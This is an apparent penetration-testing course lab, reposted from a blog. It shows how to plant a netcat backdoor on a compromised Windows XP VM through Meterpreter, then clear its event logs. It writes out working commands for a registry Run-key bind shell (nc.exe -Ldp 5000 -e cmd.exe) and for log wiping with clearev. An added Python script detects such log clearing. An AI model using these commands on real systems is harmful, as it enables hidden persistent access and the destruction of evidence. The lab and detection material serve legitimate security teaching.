Unit 4: Exploits and Exploiting 4.3 Activity and Discussion Activity: Backdoor and Persistence

mac, 2022-06-30

ACTIVITY: BACKDOOR AND PERSISTENCE

This activity is ungraded.

Remember: Watch this Demo video. Seeing me complete the activity first will help you understand each of the steps.

Backdoor Demo

System: During this activity, you’ll continue to use Metasploit as shown in the first activity in this unit.

Software: In this activity you will use these applications and resources that are included in the Kali VM:

Metasploit
Meterpreter
netcat, the TCP/IP Swiss Army Knife that lets you read from and write to network connections using TCP or UDP

Time: This activity should take you approximately 30 minutes to complete.

Goal

To set up a backdoor to a compromised machine.

Instructions

Note: Hit Enter after each command.

Once you have exploited a system, you have to maintain that level of access as patches, firewalls, and other fixes are implemented. These changes to an exploited system may prevent you from using the same exploit at some point in the future. To maintain persistence, we will use a tool called netcat to create a backdoor.

1. In the Windows XP VM, click Start > Run, and enter msconfig.
2. Examine the Startup tab. The Startup tab should not show any specific programs being launched automatically as the system boots.
3. In the meterpreter prompt within the Kali VM, enter upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32. This command uploads the Windows version of netcat (nc.exe) to the compromised system. Note the use of double backslashes in the Windows path: the first backslash is an escape character and the second is the literal backslash character.
4. Enter reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run to see what is set in one of the Run keys in the registry on the Windows XP system. Values in this key represent programs that will run every time the system starts.
5. Enter reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 5000 -e cmd.exe'.

This command writes a value, named by -v, to the registry key we accessed in the previous step.

-d supplies the data for the value. Specifically, it starts a netcat listener on port 5000 of the compromised system, so you can get back into the system with significantly less effort than before. This value will be loaded every time the Windows XP system boots.

The upper-case L option stands for "listen harder, re-listen on socket close".
The d option stands for "detach from console, background mode".
The p option stands for "local port number", which in this case is 5000.
The -e option specifies the inbound program to execute, cmd.exe.

To check the key, value, and data, enter reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc.

Covering Your Tracks

Before testing the backdoor, pentesters and hackers want to cover their tracks, which is usually the last step in any attack.

1. In the Windows XP VM, right click on Start and select My Computer > Manage > System Tools > Event Viewer. Examine the information it contains for log entries.
2. In Meterpreter, enter clearev. The log entries should disappear.
3. From Meterpreter, reboot the Windows XP system with the reboot command.
4. Close msfconsole and meterpreter.
5. Open up a new terminal, and enter nc 192.168.1.105 5000 (using the IP of the Windows XP system). You should immediately be inside the Windows XP system.
6. Go back to the Windows XP VM, and view the Startup tab of msconfig. You’ll see the netcat backdoor in the Startup tab.
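Clearing the logs with clearev only destroys the copies on the host, and the clear itself leaves a record. The following Python script is an added example, not part of the course activity, showing the detection side: it parses two constructed exports of Windows event records as pipe-separated lines (time|log|source|event_id|message), one taken from the host after the clear and one from a central collector the host forwarded its events to before the clear, flags the log-cleared records, and lists the records that survive only on the collector. The line format and message texts are constructed; the event IDs are the real ones Windows writes when a log is cleared (517 for the Security log on XP/2003, 1102 for the Security log and 104 for the System or Application log on Vista and later).

```python
"""Detect event-log clearing of the kind clearev performs, and show what
forwarding logs to a collector preserves.

Added example, not part of the course activity. Event records are modelled
as constructed pipe-separated lines: time|log|source|event_id|message.
"""

# Event IDs Windows writes when a log is cleared (real IDs; the sample
# messages below are constructed).
LOG_CLEARED_IDS = {
    517: "Security log cleared (Windows XP/2003)",
    1102: "Security log cleared (Windows Vista and later)",
    104: "System or Application log cleared (Windows Vista and later)",
}

# Constructed export from a central collector that received the host's events
# as they happened, so it still holds what clearev later wiped on the host.
COLLECTOR_EXPORT = """\
2022-06-30 10:01:12|Security|Security|528|Successful logon: Administrator
2022-06-30 10:03:45|Security|Security|592|New process created: C:\\windows\\system32\\nc.exe
2022-06-30 10:07:02|Security|Security|517|The audit log was cleared by Administrator
2022-06-30 10:07:40|System|EventLog|6006|The Event log service was stopped.
"""

# Constructed export taken from the host itself after clearev and the reboot:
# only the clear record and what came after it survive locally.
HOST_EXPORT = """\
2022-06-30 10:07:02|Security|Security|517|The audit log was cleared by Administrator
2022-06-30 10:07:40|System|EventLog|6006|The Event log service was stopped.
"""


def parse_events(text):
    """Turn the pipe-separated export into a list of dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        time, log, source, event_id, message = line.split("|", 4)
        events.append({"time": time, "log": log, "source": source,
                       "id": int(event_id), "message": message})
    return events


def find_log_clears(events):
    """Return (time, log, id, description) for every log-cleared record."""
    return [(e["time"], e["log"], e["id"], LOG_CLEARED_IDS[e["id"]])
            for e in events if e["id"] in LOG_CLEARED_IDS]


def records_lost_on_host(collector_events, host_events):
    """Records the collector holds that are gone from the host: the evidence
    the clear destroyed locally."""
    def key(e):
        return (e["time"], e["log"], e["id"], e["message"])
    on_host = {key(e) for e in host_events}
    return [e for e in collector_events if key(e) not in on_host]


def main():
    host = parse_events(HOST_EXPORT)
    collector = parse_events(COLLECTOR_EXPORT)
    for time, log, event_id, what in find_log_clears(host):
        print(f"ALERT {time} {log} log: event {event_id}, {what}")
    lost = records_lost_on_host(collector, host)
    print(f"{len(lost)} record(s) survive only on the collector:")
    for e in lost:
        print(f"  {e['time']} {e['log']} {e['id']} {e['message']}")


if __name__ == "__main__":
    main()
```

Two things fall out of this: a Security log whose oldest record is a clear event is itself an alert, and the logon and process records that explain what happened before the clear exist only where the host forwarded them. That is the reason to ship logs off the box as they are written rather than collecting them later.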

After you've finished, answer the Check Your Work questions.

Reposted from: https://www.cnblogs.com/sec875/articles/10028583.html
